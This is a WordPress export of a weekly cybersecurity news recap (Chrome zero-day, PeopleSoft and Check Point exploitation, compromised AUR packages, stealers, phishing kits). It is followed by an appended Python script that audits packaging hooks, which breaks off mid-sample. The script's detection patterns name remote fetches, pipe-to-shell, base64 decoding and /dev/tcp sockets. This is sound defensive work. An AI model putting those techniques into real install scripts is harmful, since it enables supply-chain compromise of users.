{"id":1193,"date":"2026-06-15T15:34:01","date_gmt":"2026-06-15T15:34:01","guid":{"rendered":"https:\/\/cybercolombia.co\/index.php\/2026\/06\/15\/chrome-0-day-unifi-exploits-macos-stealers-vpn-flaw-and-more-cyberdefensa-mx\/"},"modified":"2026-06-15T15:34:01","modified_gmt":"2026-06-15T15:34:01","slug":"chrome-0-day-unifi-exploits-macos-stealers-vpn-flaw-and-more-cyberdefensa-mx","status":"publish","type":"post","link":"https:\/\/cybercolombia.co\/index.php\/2026\/06\/15\/chrome-0-day-unifi-exploits-macos-stealers-vpn-flaw-and-more-cyberdefensa-mx\/","title":{"rendered":"Chrome 0-Day, UniFi Exploits, macOS Stealers, VPN Flaw and More \u2013 CYBERDEFENSA.MX"},"content":{"rendered":"<div id=\"articlebody\">\n<p>Stuff broke again. Not in a movie way. An old tool was left exposed. An abandoned package was abused. A deprecated feature was still running in prod.<\/p>\n<p>This week is the same lesson in a new form: phishing kits are easier to rent, AI names are useful bait, old login paths still fail, and forgotten software keeps becoming someone else\u2019s entry point.<\/p>\n<p>Scroll through the full Monday Cybersecurity Recap below for the news, tools, webinars, and fixes worth your time this week.<\/p>\n<h2 style=\"text-align: left;\"><b>\u26a1 Threat of the Week<\/b><\/h2>\n<p><b>Google Patches Actively Exploited Chrome 0-Day <\/b>\u2013 Google released security updates to address 74 vulnerabilities, including one that has come under active exploitation in the wild. The high-severity vulnerability, tracked as CVE-2026-11645 (CVSS score: 8.8), has been described as an out-of-bounds memory access in V8, Chrome\u2019s JavaScript and WebAssembly engine. Google acknowledged that an \u00abexploit for CVE-2026-11645 exists in the wild,\u00bb but stopped short of sharing additional specifics to ensure that a majority of the users are updated with a fix and to prevent further exploitation. 
Google has addressed a total of five actively exploited Chrome zero-days since the start of the year. This includes CVE-2026-2441, CVE-2026-3909, CVE-2026-3910, and CVE-2026-5281.<\/p>\n<h2 style=\"text-align: left;\"><b>\ud83d\udd14 Top News<\/b><\/h2>\n<ul>\n<li><b><a href=\"https:\/\/thehackernews.com\/2026\/06\/shinyhunters-exploits-oracle-peoplesoft.html\">ShinyHunters Gang Exploits Oracle PeopleSoft Zero-Day <\/a><\/b>\u2013 The ShinyHunters (aka UNC6240) extortion crew exploited an unpatched flaw in Oracle PeopleSoft (CVE-2026-35273, CVSS score: 9.8) to break into enterprise networks. The vulnerability relates to a missing authentication for a critical function that could allow an unauthenticated attacker to obtain takeover of PeopleSoft Enterprise PeopleTools. According to Google Mandiant, the exploitation activity was observed between May 27 and June 9, 2026. Following a successful compromise, the attackers have been observed conducting targeted internal reconnaissance using MeshCentral, lateral movement, and data exfiltration. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has <a href=\"https:\/\/www.cisa.gov\/news-events\/alerts\/2026\/06\/12\/cisa-adds-one-known-exploited-vulnerability-catalog\">added<\/a> the flaw to its Known Exploited Vulnerabilities (<a href=\"https:\/\/www.cisa.gov\/known-exploited-vulnerabilities-catalog\">KEV<\/a>) catalog, giving Federal Civilian Executive Branch (FCEB) agencies until June 15, 2026, to apply the fixes. The campaign has mainly targeted the higher education sector; 68% of the more than 100 notified organizations were universities and colleges. 
\u00abThe observed exploitation targeted PeopleSoft\u2019s Environment Management Hub (PSEMHUB) endpoints, and data stolen during the campaign was published on the ShinyHunters Data Leak Site (DLS) on June 9, 2026,\u00bb Rapid7 <a href=\"https:\/\/www.rapid7.com\/blog\/post\/etr-active-exploitation-of-oracle-peoplesoft-zero-day-cve-2026-35273\/\">said<\/a>.<\/li>\n<li><b>Hundreds of Arch Linux Packages Compromised to Push Rootkit and Stealer<\/b> \u2013 Unknown threat actors have <a href=\"https:\/\/discourse.ifin.network\/t\/400-aur-packages-compromised-with-infostealer-and-rootkit\/577\">managed<\/a> to compromise hundreds of legitimate-but-abandoned packages in the Arch User Repository (AUR) and modify them with preinstall scripts that download and execute a malicious npm package called atomic-lockfile. The campaign has been codenamed Atomic Arch by Sonatype. \u00abAnalysis of atomic-lockfile, the malicious dependency, found a bundled Linux payload with functionality tied to credential harvesting, stealth, anti-debugging, and potential data exfiltration,\u00bb the company said. Although the initial count of affected packages was 400, it has since <a href=\"https:\/\/lists.archlinux.org\/archives\/list\/aur-general@lists.archlinux.org\/thread\/FGXPCB3ZVCJIV7FX323SBAX2JHYB7ZS4\/\">risen to over 1,500<\/a>. As of June 12, 2026, Arch Linux developers have <a href=\"https:\/\/lists.archlinux.org\/archives\/list\/aur-general@lists.archlinux.org\/message\/FCH7TT6IOVT7D477JKSVJALBKADAARSW\/\">deleted<\/a> all the malicious commits they are aware of.<\/li>\n<li><b>Outsider PhaaS Enterprise Taken Down <\/b>\u2013 The U.S. Federal Bureau of Investigation said it took down a number of domains linked to Outsider, a Chinese phishing-as-a-service (PhaaS) kit behind an estimated 3,870,000 stolen credit cards and a corresponding estimated $1.9 billion in losses since July 2023. 
In tandem, Google said it is pursuing legal action against the operators, who weaponized Gemini to \u00abhelp generate fraudulent phishing pages and deploy massive SMS phishing (\u2018smishing\u2019) attacks, often through text messages impersonating legitimate brands, alerting recipients of \u2018brokerage account issues\u2019 or insisting they are eligible for \u2018rewards through their mobile phone carrier.\u00bb According to a complaint filed by Google, the group \u00abbuilt, maintains, and uses a turn-key, online software suite that enables criminals, regardless of technical skill, to publish fraudulent websites designed to rob victims and enrich themselves.\u00bb The toolkit costs $88 per week or $200 per month, offering access to more than 290 pre-built templates that mimic legitimate websites. The goal is to steal passwords and the corresponding multi-factor authentication codes, as well as financial information, in real time. \u00abPart of the Outsider software\u2019s appeal is the ease with which someone with limited technical expertise \u2013 like many members of the Enterprise \u2013 can purchase the software, execute various phishing attacks, and, upon purchase, meet other members of the Enterprise who are proficient in other areas,\u00bb the tech giant added.<\/li>\n<li><b>Critical Check Point VPN Flaw Exploited in Limited Attacks<\/b> \u2013 Check Point warned of active exploitation of a critical vulnerability, CVE-2026-50751 (CVSS score: 9.3), impacting Remote Access VPN and Mobile Access deployments that are still configured to use the deprecated IKEv1 key exchange protocol. The flaw is a logic weakness in certificate validation that allows an unauthenticated remote attacker to bypass user authentication and establish a remote access VPN connection without a valid user password. 
The Israeli cybersecurity company said it first observed indications of suspicious activity on June 4, 2026, with the earliest observed exploitation dating back to May 7, 2026. Exploitation efforts are said to have ramped up starting this month. The exploitation activity, Check Point added, has been limited to a \u00abfew dozen targeted organizations globally.\u00bb In one case, the post-exploitation phase has been associated with a Qilin ransomware affiliate.<\/li>\n<li><b>The Gentlemen Ransomware Claims 478 Victims<\/b> \u2013 A new analysis of The Gentlemen operation revealed that the financially motivated threat group initially operated as an affiliate responsible for conducting double extortion attacks, while leveraging resources from various ransomware-as-a-service (RaaS) schemes like LockBit (aka Tenacious Mantis), Qilin (aka Pestilent Mantis), and Medusa (aka Venomous Mantis). The group, which the researchers track as Phantom Mantis, is led by a Russian-speaking cybercriminal whom they call LARVA-368, who goes by the online aliases hastalamuerte, ArmCorp, zeta88, nobody0, and santamuerte. The Gentlemen has been active since March 2025, claiming a total of 478 victims to date. Microsoft, which is tracking the cluster under the moniker Storm-2697, said the operation \u00abinitially started as a closed ransomware group then began offering its RaaS to affiliates in September 2025.\u00bb<\/li>\n<\/ul>\n<h2 style=\"text-align: left;\"><b>\ud83d\udd25 Trending CVEs<\/b><\/h2>\n<p>Bugs drop weekly, and the gap between a patch and an exploit is shrinking fast. 
These are the heavy hitters for the week: high-severity, widely used, or already being poked at in the wild.<\/p>\n<p>Check the list, patch what you have, and hit the ones marked urgent first \u2013 CVE-2026-11645 (Google Chrome), CVE-2026-50751 (Check Point Remote Access VPN and Mobile Access), CVE-2026-35273 (Oracle PeopleSoft), CVE-2026-5027 (Langflow), CVE-2026-44963 (Veeam Backup &amp; Replication), CVE-2026-23111 (<a href=\"https:\/\/fuzzinglabs.com\/repro-cve-2026-23111\/\">Linux kernel<\/a>), <a href=\"https:\/\/openssl-library.org\/news\/vulnerabilities\/index.html#CVE-2026-45447\">CVE-2026-45447<\/a> (OpenSSL), <a href=\"https:\/\/support.sap.com\/en\/my-support\/knowledge-base\/security-notes-news\/june-2026.html\">CVE-2026-44748, CVE-2026-27671<\/a> (SAP NetWeaver AS ABAP and ABAP Platform), <a href=\"https:\/\/support.sap.com\/en\/my-support\/knowledge-base\/security-notes-news\/june-2026.html\">CVE-2026-22732<\/a> (SAP Commerce Cloud and SAP Data Hub), <a href=\"https:\/\/support.sap.com\/en\/my-support\/knowledge-base\/security-notes-news\/june-2026.html\">CVE-2026-40128<\/a> (SAP NetWeaver Application Server Java Web Container), <a href=\"https:\/\/hub.ivanti.com\/s\/article\/Security-Advisory-Ivanti-Sentry-CVE-2026-10520-CVE-2026-10523?language=en_US\">CVE-2026-10520<\/a> (Ivanti Sentry), <a href=\"https:\/\/claroty.com\/team82\/research\/turning-up-the-heat-hacking-trane-hvac-controllers\">CVE-2026-28252, CVE-2026-28253, CVE-2026-28254, CVE-2026-28255, CVE-2026-28256<\/a> (Trane Tracer SC+ HVAC controller), <a href=\"https:\/\/claroty.com\/team82\/research\/attacking-ups-network-cards-to-take-down-data-centers\">CVE-2025-46412, CVE-2025-41426<\/a> (Vertiv Liebert IS-UNITY-DP network cards), <a href=\"https:\/\/security.paloaltonetworks.com\/CVE-2026-0274\">CVE-2026-0274<\/a> (Palo Alto Networks Cortex XSOAR and Cortex XSIAM), <a href=\"https:\/\/advisory.splunk.com\/advisories\/SVD-2026-0603\">CVE-2026-20253<\/a> (Splunk Enterprise), <a 
href=\"https:\/\/kb.cert.org\/vuls\/id\/862559\">CVE-2026-9648<\/a> (Haskell TLS software stack), <a href=\"https:\/\/chromereleases.googleblog.com\/2026\/06\/stable-channel-update-for-desktop_01962725236.html\">from CVE-2026-12007 through CVE-2026-12011<\/a> (Google Chrome), <a href=\"https:\/\/orca.security\/resources\/blog\/cve-2026-45034-phpspreadsheet-rce-patch-bypass\/\">CVE-2026-45034<\/a> (PhpSpreadsheet), <a href=\"https:\/\/pentest-tools.com\/research\/phpbb-authentication-bypass\">PTT-2026-004, PTT-2026-005<\/a>, an <a href=\"https:\/\/www.aikido.dev\/blog\/phpbb-authentication-bypass-rce\">authentication bypass vulnerability<\/a> (<a href=\"https:\/\/www.phpbb.com\/community\/viewtopic.php?t=2672170\">phpBB<\/a>), and a <a href=\"https:\/\/github.com\/wazuh\/wazuh\/security\/advisories\/GHSA-ff9g-85jq-r3g3\">maximum-severity code injection vulnerability<\/a> in Wazuh (no CVE).<\/p>\n<h2 style=\"text-align: left;\"><b>\ud83c\udfa5 Expert Webinars<\/b><\/h2>\n<ul>\n<li><a href=\"https:\/\/thehacker.news\/validate-automated-pentesting\">Find Out What Your Automated Pentest Is Missing Before Attackers Do<\/a> \u2192 Automated pentesting is useful. It is also easy to overread. A tool that proves an exploit path worked does not prove your SIEM saw it, your EDR reacted, or your team could respond before damage spread. This webinar cuts through that gap: what automated pentesting actually validates, why repeat runs start returning fewer useful findings, and how BAS helps show which controls failed, not just which vulnerabilities exist.<\/li>\n<li><a href=\"https:\/\/thehacker.news\/outpacing-mythos-cyberattacks\">Stop AI-Speed Attacks Before Your Legacy Controls Catch Up<\/a><b> \u2192 <\/b>AI has changed the pace of cyberattacks. Lures get sharper, campaigns adapt faster, and attackers can test what works before defenders finish investigating. 
This webinar breaks down how AI-powered threats like Mythos get in, move, and scale, then shows how to fight back with tighter access, reduced attack surface, blocked lateral movement, and in-line controls that stop risky behavior before it becomes an incident.<\/li>\n<li><a href=\"https:\/\/thehacker.news\/securing-ai-use\">Stop Employees From Leaking Source Code, Contracts, and PII Into AI Tools<\/a> \u2192 Employees are already pasting company data into AI tools. Source code, contracts, customer records, and internal notes can leave the business through one prompt. This webinar shows how to move from after-the-fact detection to real-time prevention, with browser-level controls that stop risky AI use at the point where data is about to leak.<\/li>\n<\/ul>\n<h2 style=\"text-align: left;\"><b>\ud83d\udcf0 Around the Cyber World<\/b><\/h2>\n<ul>\n<li><b>Campaigns Use AI Brands as Lures <\/b>\u2013 Microsoft warned of campaigns capitalizing on the global interest around artificial intelligence (AI) as a social engineering lure in campaigns. \u00abThese campaigns, which don\u2019t represent compromise of services, span phishing, malvertising, and search engine optimization (SEO)-driven attacks that ultimately lead to credential theft, financial fraud, or malware infection,\u00bb the company <a href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2026\/06\/08\/ai-brands-as-bait-how-threat-actors-are-using-the-ai-hype-in-social-engineering\/\">said<\/a>. Some of the campaigns include a ChatGPT-themed lure that leads to a phishing kit collecting credit card data, a Claude-themed phishing campaign collecting credentials and access tokens, an \u00abAwesome AI Windows Plugin\u00bb malvertising campaign deploying Vidar Stealer, and Fake DeepSeek V4 installers on GitHub delivering Vidar Stealer. 
The tech giant said it \u00abobserved the initial access broker Storm-3075 employing AI-themed malvertising to deliver payloads, including malware signed by the malware-signing-as-a-service (MSaaS) offering attributed to the financially motivated threat actor Fox Tempest, on behalf of multiple downstream actors.\u00bb<\/li>\n<li><b>macOS Users Targeted by Fake Installers <\/b>\u2013 Deceptive installers for popular software are being used to push information stealers to macOS users. \u00abThe infection chain almost always starts inside a web browser,\u00bb Huntress <a href=\"https:\/\/www.huntress.com\/blog\/deceptive-installers-macos-infostealers\">said<\/a>. \u00abThreat actors lean heavily on search engine optimization (SEO) poisoning to hijack search results, or they seed compromised links across torrent networks and cracked software forums. A user drops their guard, clicks the malicious link, and downloads what they assume is an authentic installer.\u00bb The DMG files, once executed, aim to bypass Apple Gatekeeper protections to realize their goals. In 2024, more than 65% of newly reported macOS malware was classified as infostealers.<\/li>\n<li><b>History of Chinese-Language Guarantee Marketplaces <\/b>\u2013 Flare has shed light on the \u00abguarantee model\u00bb that powers various illicit online Telegram marketplaces like HuiOne Guarantee and Tudou Guarantee. \u00abThese marketplaces are third-party escrow services for illicit transactions,\u00bb security researcher Chris d\u2019Eon <a href=\"https:\/\/flare.io\/learn\/resources\/blog\/prehistory-chinese-language-guarantee-marketplaces\">explained<\/a>. \u00abThe marketplace operator stands between buyer and seller, holds the buyer\u2019s funds in escrow, releases them to the seller only when the buyer confirms delivery, and adjudicates disputes when something goes wrong. 
In return, the operator collects deposits from vendors who want to advertise under its brand, fees on transactions, and revenue from paid promotional slots.\u00bb The model, which has its roots in legitimate Chinese consumer-internet trust architecture launched by Alipay in 2003, facilitates the sale of money laundering services, stolen data, fraud kits, fake identity documents, recruitment for scam compounds, retail fraud, deepfake services, and the physical infrastructure that drives human trafficking and forced-labour compounds. Law enforcement crackdown has led to \u00abfragmentation but not elimination\u00bb of the criminal enterprise. More than 30 successor marketplaces have emerged following the takedown of HuiOne and Xinbi, almost all of them managing their operations via Telegram owing to its reach, bot infrastructure, and <a href=\"https:\/\/www.trmlabs.com\/resources\/blog\/huione-guarantee-and-xinbi-still-operating-on-telegram-despite-ban-underscoring-illicit-actors-persistence\">improved resilience<\/a> despite the platform\u2019s efforts to crack down on such activities. These include Tiancheng, Dabai, Ouyi, Yinuo, Jin Bo, Haihua, Timi, and Lao Niu.<\/li>\n<li><b>UniFi OS Flaws Exploited <\/b>\u2013 The UniFi OS Server remote code execution chain, comprising CVE-2026-34908, CVE-2026-34909, and CVE-2026-34910, is now being actively exploited, according to <a href=\"https:\/\/x.com\/DefusedCyber\/status\/2064238751258178006\">Defused Cyber<\/a>, following a <a href=\"https:\/\/bishopfox.com\/blog\/popping-root-on-unifi-os-server-unauthenticated-rce-chain-detection-analysis\">report from Bishop Fox<\/a> about how the three flaws could be combined to achieve unauthenticated code execution as root. 
The attacks culminated in the deployment of commodity malware.<\/li>\n<li><b>Khmer Shadow Targets Cambodian Government Entities <\/b>\u2013 A targeted cyber espionage campaign against Cambodian government entities has leveraged a meeting-themed SFX archive to sideload a custom C++ loader dubbed NIGHTFORGE, which then decrypts and executes a Havoc Demon payload in memory. \u00abNIGHTFORGE has demonstrated a moderate level of sophistication, combining advanced defense-evasion techniques such as NTDLL unhooking and Hell\u2019s Gate syscall resolution, a method that enables direct system calls and helps evade user-mode monitoring, with operational shortcomings that suggest the tool is still under active development,\u00bb Acronis <a href=\"https:\/\/www.acronis.com\/en\/tru\/posts\/behind-khmer-shadow-targeted-espionage-against-cambodian-government-entities\/\">said<\/a>. The activity has not been attributed to any known threat group, but it\u2019s \u00ablikely aligned with regional intelligence collection interests in Southeast Asia.\u00bb<\/li>\n<li><b>How Attackers Could Exploit Cloud Logging Services <\/b>\u2013 Palo Alto Networks Unit 42 has <a href=\"https:\/\/unit42.paloaltonetworks.com\/cloud-logging-defense-evasion\/\">warned<\/a> that threat actors could exploit cloud logging services, which are crucial for security monitoring, to \u00abcreate weak spots, evade detection, and in certain scenarios, establish continuous visibility within a target\u2019s environment.\u00bb Attackers could tamper with resources within the cloud logging service (e.g., disabling, altering, or deleting logs, or otherwise impairing logging) to hide their presence, or attempt to route logs to their own accounts, which gives them continuous visibility over the victim\u2019s environment, continuous discovery, and passive monitoring of all activity.<\/li>\n<li><b>Operation TaxShadow Delivers Multi-Stage Malware Framework <\/b>\u2013 An Indian tax-themed phishing campaign has been observed 
delivering a sophisticated multi-stage malware framework through a mix of social engineering, phishing infrastructure, and memory-resident malware execution techniques. \u00abThe campaign begins with a fraudulent tax notification email impersonating an official Indian tax authority, leveraging government branding, urgency-based messaging, and compliance-related threats to manipulate victims into interacting with a malicious phishing website,\u00bb CYFIRMA <a href=\"https:\/\/www.cyfirma.com\/research\/operation-taxshadow-multi-region-tax-phishing-in-memory-malware-campaign\/\">said<\/a>. \u00abVictims are subsequently instructed to download a malicious ZIP archive containing three staged payload components: \u0915\u0930 \u0935\u093f\u0935\u0930\u0923.exe, SbieDll.dll, and SbieDll.bin, which collectively establish the complete infection lifecycle.\u00bb The attack makes use of a highly modular malware architecture, coupled with advanced defense-evasion and anti-analysis techniques, to launch a payload in memory. 
The malware also establishes persistent WebSocket-based communications.\n<div class=\"separator\" style=\"clear: both;\"><a href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhZJ844MIql-z7-z1mmrkX21WamSWBiYRA9pldIoCnDPjAKbO4_y73pxEVJeAwIKrTB0SN91WkVEh4uYGpN5ctF46iOldNYo3HKhTyn5-Bt1E9rN744KZ7ykKxZMhzW6f-Rwr3dkhNchgoVIogpHDw_8PwuOxsa15oCI37Wcnee2vl6FHrES0y8at9iBkub\/s1700-e365\/ph.jpg\" style=\"display: block;  text-align: center; clear: left; float: left;\"><img decoding=\"async\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhZJ844MIql-z7-z1mmrkX21WamSWBiYRA9pldIoCnDPjAKbO4_y73pxEVJeAwIKrTB0SN91WkVEh4uYGpN5ctF46iOldNYo3HKhTyn5-Bt1E9rN744KZ7ykKxZMhzW6f-Rwr3dkhNchgoVIogpHDw_8PwuOxsa15oCI37Wcnee2vl6FHrES0y8at9iBkub\/s1700-e365\/ph.jpg\" alt=\"\" border=\"0\" data-original-height=\"388\" data-original-width=\"806\"\/><\/a><\/div>\n<\/li>\n<li><b>MagicAd Displays Background Ads on Android Devices <\/b>\u2013 A new Android trojan called MagicAd has been found to bypass operating system restrictions to display background ads. \u00abOne of these methods is universal, while the others are designed for devices from specific manufacturers,\u00bb Russian cybersecurity company Doctor Web <a href=\"https:\/\/news.drweb.com\/show\/?i=15262&amp;lng=en&amp;c=9\">said<\/a>. \u00abThese include exploiting third-party software and using the system media player.\u00bb The malware is distributed via apps on GetApps, the official app catalog for Xiaomi devices. It has been discovered in more than 50 games and apps. The campaign is assessed to have commenced in 2025, with the threat actors behind it also leveraging the Samsung Galaxy Store as a distribution mechanism. 
Currently, none of the apps are available for download.<\/li>\n<li><b>Residential Proxies in the Wild <\/b>\u2013 Residential proxies are designed to relay internet traffic through devices that belong to regular consumers, such as home routers, mobile devices, IoT devices, and devices with applications embedded with proxyware. One way this is achieved is that application developers themselves can embed software development kits (SDKs) provided by the residential proxy networks into their products as a way to monetize their software, allowing them to receive a small amount of money on each installation. In an analysis published last week, Infoblox said monthly queries to residential proxy domains steadily grew from nearly 400 billion to over 500 billion between January 2025 and April 2026 across its customer base, an increase of about 25%. \u00abThere are likely several explanations for this: certainly, the rise in AI-related training, which often requires scraping websites, is a major driver of residential proxy demand,\u00bb it <a href=\"https:\/\/www.infoblox.com\/blog\/threat-intelligence\/residential-proxies-in-the-wild\/\">said<\/a>. \u00abResidential proxies bypass many anti-scraping measures, as the traffic appears to be coming from the devices of real people.\u00bb Some of the most commonly observed proxy services queried include Bright Data, Hola VPN, Oxylabs Proxy, Honeygain, and Grass. The DNS threat intelligence firm said many residential proxy services operate in a grey space.<\/li>\n<li><b>SHEET#CREEP Drops C# Remote Access Trojan <\/b>\u2013 An ongoing cyber espionage campaign dubbed SHEET#CREEP has leveraged a diplomatic-themed ISO phishing lure to distribute a C# remote access trojan (RAT). The activity was previously flagged by Zscaler and Bitdefender, attributing it to a threat actor known as Transparent Tribe. 
\u00abThe RAT abuses the Google Sheets API as its command-and-control (C2) channel, authenticating via an embedded GCP service account private key and using individual spreadsheet tabs per victim for bidirectional communication,\u00bb Securonix researchers Shikha Sangwan, Akshay Gaikwad, and Aaron Beardslee <a href=\"https:\/\/www.securonix.com\/blog\/sheetcreep-evolved-google-sheets-rat\/\">said<\/a>. \u00abThe LNK triggers a C# dropper that extracts a bait PDF, drops the RAT payload into the Windows Vault directory, and establishes persistence through a scheduled task, before melting (self-deleting) to remove forensic traces.\u00bb The cybersecurity company said it identified 91 active victim tabs in the C2 spreadsheet, including a high-confidence target located in Pakistan.<\/li>\n<li><b>Malware Distributed via npm and PyPI Packages <\/b>\u2013 A cryptocurrency-focused software supply chain campaign has used malicious npm packages to facilitate credential harvesting, wallet theft, remote payload delivery, and blockchain-based command-and-control. \u00abTechnical analysis uncovered capabilities including cryptocurrency wallet interception, private key and mnemonic phrase theft, SSH credential harvesting, environment variable collection, sensitive file discovery, remote activation mechanisms, blockchain-based infrastructure retrieval, and multi-stage malware deployment,\u00bb CYFIRMA <a href=\"https:\/\/www.cyfirma.com\/research\/new-npm-supply-chain-campaign-identified-a-multi-stage-cryptocurrency-malware-with-more-than-2-7-million-downloads\/\">said<\/a>. A second campaign, codenamed <a href=\"https:\/\/research.jfrog.com\/post\/solana-fakefix\/\">Solana FakeFix<\/a>, has targeted Solana developers with 20 bogus npm and PyPI packages to steal wallet keys, cloud credentials, source-control tokens, SSH keys, and environment secrets, while a third campaign, CMS Windows Loader, has used five npm packages to load remote executables and JavaScript code dynamically. 
In a related development, two versions of the dbmux npm package (2.2.5 and 1.0.5) were flagged for containing malware. \u00abAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer,\u00bb according to a <a href=\"https:\/\/research.jfrog.com\/post\/solana-fakefix\/\">GitHub advisory<\/a>. \u00abThe package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.\u00bb<\/li>\n<li><b>Ransomware Attack Uses Easyupload.io for Data Exfiltration <\/b>\u2013 In one ransomware attack investigated by Huntress, a threat actor accessed the victim\u2019s hypervisor and created a new virtual machine (VM) as a staging location from which they launched the Akira ransomware. The threat actor rapidly progressed through the attack, disabling Microsoft Defender and installing WinRAR, an archival tool typically used by threat actors for staging data. \u00abThe threat actor used the Microsoft Edge browser to access Bing, and search for the term \u2018eayupload\u2019 before settling on Easyupload.io, a website that provides access to file uploads via drag-and-drop,\u00bb the cybersecurity company <a href=\"https:\/\/www.huntress.com\/blog\/akira-ransomware-limewire-data-exfiltration\">said<\/a>. \u00abShortly after accessing the LimeWire website, presumably to exfiltrate staged archives, the threat actor launched the akira.exe file encryptor against several mounted shares.\u00bb<\/li>\n<\/ul>\n<h2 style=\"text-align: left;\"><b>\ud83d\udd27 Cybersecurity Tools<\/b><\/h2>\n<ul>\n<li><a href=\"https:\/\/github.com\/trustedsec\/spoonmap\">SpooNMAP<\/a> \u2192 It is a Python tool that wraps Nmap and Masscan to make port scanning easier and faster. 
It guides users through scan options, supports small, medium, large, full, and custom scans, can grab service banners with Nmap, and lets users scan target IPs or CIDR ranges from a file.<\/li>\n<li><a href=\"https:\/\/github.com\/mukul975\/cve-mcp-server\">CVE MCP Server<\/a> \u2192 It connects Claude to 27 security intelligence tools across 21 data sources, helping analysts look up CVEs, check EPSS and CISA KEV status, find PoCs, scan dependencies, review IP reputation, and generate risk reports from one place.<\/li>\n<\/ul>\n<p><i>Disclaimer: This is strictly for research and learning. It hasn\u2019t been through a formal security audit, so don\u2019t just blindly drop it into production. Read the code, break it in a sandbox first, and make sure whatever you\u2019re doing stays on the right side of the law.<\/i><\/p>\n<h2 style=\"text-align: left;\"><b>Conclusion<\/b><\/h2>\n<p>This week\u2019s lesson is simple: attackers do not need magic. They need old code, busy teams, weak defaults, and one forgotten box nobody wants to claim.<\/p>\n<p>That is the uncomfortable part. The next big incident may already be sitting in your stack, quietly working as designed.<\/p>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>Stuff broke again. Not in a movie way. An old tool was left exposed. An abandoned package was abused. A deprecated feature was still running in prod. 
This week is the same lesson in a new form: phishing kits are easier to rent, AI names are useful bait, old login paths still fail, and forgotten [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":1194,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[25,5],"tags":[305,17,24,144,2822,422,3115,1117,866],"class_list":["post-1193","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-noticias","category-trending","tag-0day","tag-chrome","tag-cyberdefensa-mx","tag-exploits","tag-flaw","tag-macos","tag-stealers","tag-unifi","tag-vpn"],"_links":{"self":[{"href":"https:\/\/cybercolombia.co\/index.php\/wp-json\/wp\/v2\/posts\/1193","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/cybercolombia.co\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/cybercolombia.co\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/cybercolombia.co\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/cybercolombia.co\/index.php\/wp-json\/wp\/v2\/comments?post=1193"}],"version-history":[{"count":0,"href":"https:\/\/cybercolombia.co\/index.php\/wp-json\/wp\/v2\/posts\/1193\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/cybercolombia.co\/index.php\/wp-json\/wp\/v2\/media\/1194"}],"wp:attachment":[{"href":"https:\/\/cybercolombia.co\/index.php\/wp-json\/wp\/v2\/media?parent=1193"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/cybercolombia.co\/index.php\/wp-json\/wp\/v2\/categories?post=1193"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/cybercolombia.co\/index.php\/wp-json\/wp\/v2\/tags?post=1193"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
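Added example for the Atomic Arch item in Top News above. This is not code from the recap, Sonatype or Arch Linux: it is a small audit script a practitioner could run over the PKGBUILD and .install files of the AUR packages on a machine. It extracts the shell functions makepkg and pacman execute and flags packaging-time hooks that fetch remote content, install npm or pip packages, decode blobs, or pipe downloads into a shell. The two sample files are constructed to illustrate the pattern the recap describes (a pre_install hook pulling an npm package named atomic-lockfile); they are not the real malicious commit, and the exact commands used in the real campaign are not on the page.

```python
"""Audit PKGBUILD / .install hook functions for packaging-time code execution.

Added example, not code from the recap, Sonatype or Arch Linux. The recap says
compromised AUR packages were modified with preinstall scripts that download and
execute a malicious npm package. This extracts the shell functions from a
PKGBUILD or .install file and flags hooks that fetch remote content, run npm or
pip, decode blobs or pipe downloads into a shell. Sample inputs are constructed.
"""
import re
import sys

# Functions pacman/makepkg execute: .install hooks plus the PKGBUILD build phases.
HOOKS = {
    "pre_install", "post_install", "pre_upgrade", "post_upgrade",
    "pre_remove", "post_remove", "prepare", "build", "check", "package",
}
SUSPICIOUS = [
    (re.compile(r"\b(curl|wget)\b.*\bhttps?://"), "remote fetch"),
    (re.compile(r"\bnpm\s+(install|i|exec|x)\b|\bnpx\b"), "npm install/exec during packaging"),
    (re.compile(r"\bpip3?\s+install\b"), "pip install during packaging"),
    (re.compile(r"\bbase64\s+(-d|--decode)\b"), "base64 decode"),
    (re.compile(r"\beval\b"), "eval"),
    (re.compile(r"\|\s*(ba)?sh\b"), "pipe to shell"),
    (re.compile(r"/dev/tcp/"), "bash raw socket"),
]
FUNC_START = re.compile(r"^\s*([A-Za-z_][A-Za-z0-9_]*)\s*\(\)\s*\{")


def functions(text):
    """Map function name -> body for bash functions written as `name() {` ... `}`.
    Brace counting is deliberately naive (no quoting rules); adequate for PKGBUILDs."""
    out, name, body, depth = {}, None, [], 0
    for line in text.splitlines():
        if name is None:
            m = FUNC_START.match(line)
            if not m:
                continue
            name, body, depth = m.group(1), [], 1
            line = line[m.end():]          # keep anything after the opening brace
        depth += line.count("{") - line.count("}")
        body.append(line)
        if depth <= 0:
            out[name] = "\n".join(body)
            name = None
    return out


def audit(text):
    """Return (function, rule, offending line) triples for hook functions matching SUSPICIOUS."""
    findings = []
    for fname, body in functions(text).items():
        if fname not in HOOKS:
            continue
        for line in body.splitlines():
            code = line.split("#", 1)[0]      # drop trailing comments (naive)
            for rx, label in SUSPICIOUS:
                if rx.search(code):
                    findings.append((fname, label, code.strip()))
    return findings


# Constructed samples. The second imitates the pattern the recap describes; it is
# not the real malicious commit.
BENIGN_INSTALL = """\
post_install() {
  echo "Run 'foo --init' once to create the config."
}
post_upgrade() {
  post_install
}
"""

MALICIOUS_INSTALL = """\
pre_install() {
  # looks like housekeeping, actually pulls and runs remote code
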